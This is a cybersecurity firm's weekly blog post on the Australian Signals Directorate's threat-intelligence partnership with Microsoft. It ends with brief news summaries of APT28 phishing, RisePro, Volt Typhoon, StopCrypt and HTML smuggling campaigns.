#NSBCS.018 - The Road Ahead: The Importance of Public and Private Partnerships

Cyber Defence
Written By Shane Bell
#NSBCS.018 - The Road Ahead: The Importance of Public and Private Partnerships

Source: NSB Cyber

 

The Road Ahead: The Importance of Public and Private Partnerships

Australia's cybersecurity posture is poised for a significant upgrade with the announcement of a collaborative effort between the Australian Signals Directorate (ASD) and Microsoft. This partnership goes beyond simply using Microsoft products; it aims to integrate Microsoft’s Sentinel platform directly with ASD's Cyber Threat Intelligence Sharing (CTIS) platform. This integration will create the Microsoft-Australian Signals Directorate’s Cyber Shield (MACS), a crucial link facilitating the rapid exchange of critical cyber threat information, ultimately strengthening Australia's digital defences.

Prior to this collaboration, Australian organisations might have been leveraging both Microsoft security solutions and participating in the ASD's CTIS platform, however, these initiatives functioned somewhat independently. Australian entities that are customers of Microsoft and also partners in the CTIS program can now seamlessly share and receive real-time cyber threat intelligence directly through the integrated platform. This eliminates the need for separate communication channels and significantly reduces the time it takes for critical threat data to reach the relevant parties.

Benefits and Potential Impact:

The ASD-Microsoft partnership offers a multitude of advantages for Australia's cybersecurity landscape:

  • Enhanced Threat Detection and Response: The real-time exchange of threat information allows for faster identification and mitigation of cyberattacks. By sharing data instantaneously, Australian organisations can proactively address emerging threats before they cause significant disruption.

  • Improved Visibility and Collaborative Efforts: The integration offers a more comprehensive view of the ever-evolving cyber threat landscape. This broader perspective allows for better informed decision-making at all levels. Public and private sector entities can collaborate more effectively, leading to the development and implementation of national cybersecurity strategies that address the most pressing threats.

  • Strengthened Threat Intelligence Sharing: Streamlined information sharing strengthens Australia's overall cyber resilience. With a more robust intelligence network, the Nation can better anticipate and defend against sophisticated cyberattacks. This collaborative approach fosters a more unified front against cyber threats, making it more difficult for malicious actors to exploit vulnerabilities.

The ASD-Microsoft collaboration serves as a prime example of the importance of public-private partnerships in combating cyber threats. By leveraging the expertise and resources of both sectors, Australia can create a more secure digital environment for businesses, government agencies, and individual citizens. This initiative paves the way for a future where real-time threat intelligence sharing and collaborative efforts form the cornerstone of Australia's national cybersecurity strategy.

The success of this partnership can serve as a model for future collaborations, not just within Australia but on a global scale. As the cyber threat landscape continues to evolve, international cooperation and the exchange of vital information will be crucial in safeguarding the digital world from taking #NoStepsBackward!

For information on NSB Cyber’s Cyber Threat Intelligence capabilities or to book a meeting with our team, click here.

What we read this week

  • APT28 Hacker Group Targeting Europe, Americas, Asia in Widespread Phishing Scheme - The Russia-linked threat actor group known as APT28 has been flagged for launching multiple phishing campaigns against a wide range of victims across Europe, the Americas, the South Caucasus, Central Asia, and North and South America. APT28 utilises phishing emails disguised as communications from legitimate government and non-governmental organisations (NGOs) to compromise victims. Once a user clicks on a malicious link or attachment, malware like MASEPIE, OCEANMAP, or STEELHOOK gets deployed on their system.

  • Hackers Using Cracked Software on Github to Spread RisePro Info Stealer - Cybersecurity researchers have uncovered a malware distribution campaign targeting unsuspecting users through cracked software offered on GitHub repositories. The campaign leverages cracked software readily available on GitHub to distribute RisePro, an information-stealing malware. Hackers upload compromised versions of popular software laced with the RisePro malware onto GitHub repositories and when users download and install these cracked versions, RisePro gets installed on their systems in the background. Security firm G DATA have identified 17 repositories associated with 11 accounts on GitHub containing the malicious software.

  • Australia and Five Eyes allies issue new Volt Typhoon advisory - A joint security advisory issued by the intelligence alliance known as Five Eyes reveals an ongoing cyber threat from China. The advisory, published by the United States Cybersecurity and Infrastructure Security Agency (CISA), highlights the activities of Chinese state-sponsored hacking groups collectively referred to as Volt Typhoon. These groups have been targeting critical infrastructure providers in the United States and potentially other Five Eyes countries (Australia, Canada, New Zealand, and the United Kingdom). Volt Typhoon is known for its use of living off the land (LOTL) techniques which leverage legitimate system tools and functionalities to perform malicious activities, making them difficult to detect. The advisory warns that Volt Typhoon may have had access to critical infrastructure networks for at least five years, raising concerns about potential disruptions to essential services.

  • StopCrypt: Most widely distributed ransomware evolves to evade detection - There have been recent reports regarding a new variant of the StopCrypt ransomware exhibiting advanced evasion tactics. StopCrypt, also known as STOP Djvu, is one of the most prevalent ransomware strains, though it often operates under the radar compared to its high-profile counterparts. This new variant employs a multi-stage execution process to bypass security measures. The malware initially loads a seemingly unrelated DLL file, potentially as a decoy and it also implements time-delaying loops and dynamically constructs API calls to hinder detection.

  • Hackers Using Sneaky HTML Smuggling to Deliver Malware via Fake Google Sites - Cybersecurity researchers have uncovered a novel malware campaign exploiting a technique called "HTML Smuggling" to distribute the AZORult information stealer malware. Attackers create counterfeit Google Docs pages using Google Sites and this technique involves embedding malicious code within seemingly legitimate HTML content. In this case, the Google Docs page retrieves the malicious payload from a separate JSON file hosted on another website. The use of fake Google Docs pages and HTML Smuggling increases the legitimacy of the phishing attempt, potentially tricking unsuspecting victims into interacting with the malicious content.

References
https://thehackernews.com/2024/03/apt28-hacker-group-targeting-europe.html
https://thehackernews.com/2024/03/hackers-using-cracked-software-on.html
https://www.cyberdaily.au/security/10349-australia-and-five-eyes-allies-issue-new-volt-typhoon-advisory
https://www.bleepingcomputer.com/news/security/stopcrypt-most-widely-distributed-ransomware-evolves-to-evade-detection/
https://thehackernews.com/2024/03/hackers-using-sneaky-html-smuggling-to.html
Shane Bell
Previous

#NSBCS.019 - Cracks in the Windows: Unravelling Microsoft's Security Saga
Next

#NSBCS.017 - The Responsibility Within: Prioritising Domestic Cybersecurity for a Safer Australia